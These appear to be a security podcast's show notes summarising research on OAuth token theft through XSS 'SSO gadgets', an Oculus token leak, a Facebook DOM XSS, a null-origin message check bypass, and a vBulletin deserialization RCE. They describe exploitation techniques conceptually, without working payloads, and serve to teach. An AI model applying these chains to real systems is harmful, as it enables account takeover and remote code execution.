Show Notes

185 - Facebook Account Takeovers and a vBulletin RCE

A bit of research on leaking access tokens from OAuth2/OIDC flows, in all cases you already need a cross-site scripting vulnerability to exist on the host recieving the callback, it does present an interesting case of escalating two often unimportant issues, a self-XSS and a Login CSRF, into an account takeover though.

The author presents three cases of “SSO Gadgets”. These are different techniques you may be able to use to capture a usable token. They all make a few assumptions: the attacker must have an XSS on the host already, the victim user must already have authorized the application, and the identity provider support the prompt=none URL parameter which tells it to immediately return with the code without needing any user interaction.

Implicit Flow Support - The implicit flow is a weak OAuth2 flow where the access token is returned in the URL and that token can be used immediately against the provider. In this case, an attacker can simply open a new window to the provider, wait for the redirect to happen and read the token from the URL.

Confidential Client, Using Code Flow with no PKCE - Normally with this flow, the user will be redirected back to the host with a token, but unlike the implicit flow the token is not immediately useful. Instead the server will send the token and a secret value back to the provider, who will then give them the access token. This way the access token is never exposed to clients. The trick to be able to hijack the code from these flows is to disrupt that exchange process and prevent the server from actually trying to exchange the token that is sent back.

The author mentioned two tricks that might be useful to do this, one is changing the repsonse_type making it so token will no longer be in the expected location. Setting it to fragment for example will make it invisible to the server-side to read, but can still be captured by an attacker with an XSS. Another trick would be to provide an invalid state. If the server validated the state before trying to consume the token, it may fail without consuming the token. In both cases, the attacker ends up with this “exchange token”. They can then start their own OAuth2/OIDC flow, and swap out their rela exchange token for the captured one. The server will then process that stolen token and log the attacker into the victim’s account. There are likely other ways the flow could be broken, but the two mentioned are probably the most common.

Single-Page Application with Code Flow and PKCE - This one is a bit “meh” to me, an XSS on a single-page application is already basically game over. All they do for this one is just simulate the normal flow since they have all the access from the XSS. CCompute the code_verifier and code_challenge values, open a new window with the appropiate OAuth code flow URL and the computed values, await the redirect and obtain the code.

They provide a “real-world” example, though they don’t provide any application details. It is an interesting chain though, and a nice escalation from normally pretty weak issues.

The first issue in the chain, is a Login CSRF, the ability to force another user to login as an attacker controlled account. They chain this with a self-XSS in their username. Often this is not seen as a terribly useful chain since the XSS just provided access to the attacker’s own account even if the victim is on it, though they combine it with one of their SSO Gadgets. As the victim would still have their session with the identity provider, they can use an SSO Gadget to steal their access token through the XSS while they are logged into the victim.

Lastly, they call out that Oauth applications registered with Google as “Web Applications” cannot disable the implicit flow, so that gadget is widely available.

Simple token leakage bug in Oculus endpoints due to migration from using Facebook accounts to Meta accounts. Where the first party access token was previously difficult to leak due to redirects being made through JavaScript, with the new meta authentication flow, redirection was done directly via URL with the token. The domain was validated against subdomains of oculus.com, but various subdomains (like forums.oculus.com) would utilize third party apps. Any open redirect could therefore be utilized to leak first party access token and hijack the account.

The open redirect is undisclosed as it’s not fixed as of writing.

DOM-based XSS in Facebook via Instant Games (a newer feature being gradually rolled out). The vulnerability here is in the goURIOnWindow function which is used for supplying the window location and verifying it. What’s strange is this method can take the URI in the form of a string (in which case it will create an internal URI object instance) or objects to provide a direct URI object, which is intended to only be creatable via secure contexts. The problem is, they never actually validate the incoming object is a direct URI object, and so an attacker can pass in something like an array to bypass validation.

This bug is reachable in multiple places, virtually anywhere that uses goURIOnWindow with user-provided input without converting it to a URI object first. The post calls out two modules that could be reached by attackers, useInteractivePluginSDKMessageHandler.react and its openurlasync() method, as well as InstanceGamesOpenExternalLinkDDialog.reacts showgenericdialogasync method. The former is only reachable in a couple of games. The latter is presumably hittable by more games, but it requires an additional click to exploit where it’s dialog-based.

Meta confirmed this issue was hittable from other places on facebook that didn’t require user interaction.

A rather simple bug in validating the origin of a Cross-window message due to inappropriately handling null values.

First, lets talk about the normal flow of things. Some Facebook system embeds third-party applications into its pages. those third-parties can send messages to their parent frame (the Facebook page) to do the OAuth flow for the user. That parent page, has an iframe to the “Compat” endpoint which it can communicate with. It is the “Compat” page which actually triggers the OAuth flow, and dialog display, it uses the arbiter endpoint for its redirect_uri. This arbiter endpoint will send the access code back to the “Compat” page, which sends it to whatever Facebook page asked for it, who should do any necessary security checks (also doing this before they send the OAuth request to “Compat”).

With the arbiter if someone could get the arbiter to return the access code to them without actually being from the “Compat” page or some other trusted location, that would be a vulnerability. Similarly, the “Compat” page only trusts pages on the same origin and sends back any access codes it recieves without any security. So if one could embed the “Compat” page and pass the checks it performs before accepting communication, they could get an OAuth flow triggered for a first-party application and recieve the access token back.

This is where the core issue lies, the “Compat” page attempts to get a URI object for the domain that embeded it, and then compares that with the whitelist. In the following code this is the uri object for the attacker’s location, and a is the whitelisted URI.:

if (this.getProtocol() && this.getProtocol() !== a.getProtocol())
return !1;
if (this.getDomain() && this.getDomain() !== a.getDomain())
return !1;
if (this.getPort() && this.getPort() !== a.getPort())
return !1;
return this.toString() === "" || a.toString() === "" ? !1 : !0

At a glance this code makes sense, but if “Compat” is loaded inside of a sandboxed iframe then the URI object for the attacker’s location will be filled with null values. The way all of these checks are written, null will be treated as a success. this.getProtocol() && this.getProtocol() !== a.getProtocol() for example, never reaches the check with the value in a since it will stop when this.getProtocol() resolves to a falsey value.

There is the apparent null check at the end, but the .toString() on the URI object doesn’t result in “” but “null”, again passing the check.

So any attacker can embed the “Compat” frame inside of a sandboxed iframe, and then trigger the Oauth flow pretending to be a first-party application, and receive back the access tokens.

The author then goes on to details more about the actual exploit chain and some other challenges to get around, but I felt that this was atleast the interesting and more generic part of the writeup to summarize but give the rest a read if you’re interesting in some Facebook/Meta specific details.

Simple enough vulnerable, a POST parameter was directly unserialized, which would often be pretty damning, but vBulletin apparently had put in some effort to make it hard to exploit.

There is no universal deserialization gadget for RCE in PHP, each attacker is going to depend on the classes the application itself has and if they do anything sensitive. In vBulletin’s case, they take an extra step and protect many of their classes from being targets by implementing trails that raise exceptions when they are deserialized severely limiting the targets.

They did find that in the packageas path there was a vulnerable class, packages/googlelogin/vendor/monolog which has a known deserialization gadget, the problem was despite the code existing, as it wasn’t included on the page the necessary classes could not be deserialized.

To get aorund this they abuse vBulletin’s class autoloader. If you’re unfamiliar with autoloading in PHP you can provide a function to PHP that is called whenever it tries to create a class it doesn’t know about giving that function a chance to include any files that might be necessary. The authors here were able to abuse vBulletin’s autoloader by first trying to deserialize the googlelogin_vendor_autoload class, which the autoloader would see and then load the packages/googlelogin/vendor/autoload.php file. Which would include the needed monoglog file, allowing the known deserialization gadget to be used.

Autoloading is a weird feature in PHP, really powerful, and used somewhat silently because it makes developer’s lives easier, but as seen here it can be a useful gadget in an exploit chain.